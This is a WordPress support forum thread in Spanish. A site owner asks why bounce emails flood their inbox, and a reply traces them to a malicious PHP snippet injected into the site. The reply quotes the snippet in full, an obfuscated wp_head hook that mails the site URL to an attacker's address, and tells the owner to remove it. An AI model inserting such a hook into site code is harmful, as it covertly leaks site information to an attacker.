• Hola,

    Usando Easy WP SMTP + Contact Form 7 envia bien los correos mediante el formulario desde la web, pero también inunda de estos mails (Spam?) que os muestro:

    Asunto: No se puede entregar: WordPress Plugin

    Delivery has failed to these recipients or distribution lists:

    jaqqscigs@gmail.com
    There’s a problem with the recipient’s mailbox. Microsoft Exchange will not try to redeliver this message for you. Please try resending this message, or provide the following diagnostic text to your system administrator.

    The following organization rejected your message: mx.google.com.

    _____
    Sent by Microsoft Exchange Server 2007

    Diagnostic information for administrators:

    Generating server: exhub3.hmc4.priv

    jaqqscigs@gmail.com
    mx.google.com #550-5.2.1 The user you are trying to contact is receiving mail at a rate that 550-5.2.1 prevents additional messages from being delivered. For more 550-5.2.1 information, please visit 550 5.2.1 http://support.google.com/mail/bin/answer.py?answer=6592 c20si1532367wjs.154 – gsmtp ##

    Original message headers:

    ¿sabeis alguno qué esta pasando? Gracias!

Viendo 1 respuesta (de un total de 1)
  • Sory For my bad english

    just find this script on entire your web file:

    addressdecode=base64_decode(«amFxcXNjaWdzQGdtYWlsLmNvbQ==»)

    because that code is same with this code:

    addressdecode=»jaqqscigs@gmail.com»;

    find that code then replace this entire code

    add_action(‘wp_head’,’my_wpfunww439′);function my_wpfunww439(){if(!username_exists(‘wordpress’)){$addressdecode=base64_decode(«amFxcXNjaWdzQGdtYWlsLmNvbQ==»);$vari=’Wordpress Plugin’;wp_mail($addressdecode,$vari,get_bloginfo(‘wpurl’));}}

    now your web is free from jaqqscigs@gmail.com spamming

    Hope helps

    Tenkyu

Viendo 1 respuesta (de un total de 1)
  • El debate ‘Asunto: No se puede entregar: WordPress Plugin’ está cerrado a nuevas respuestas.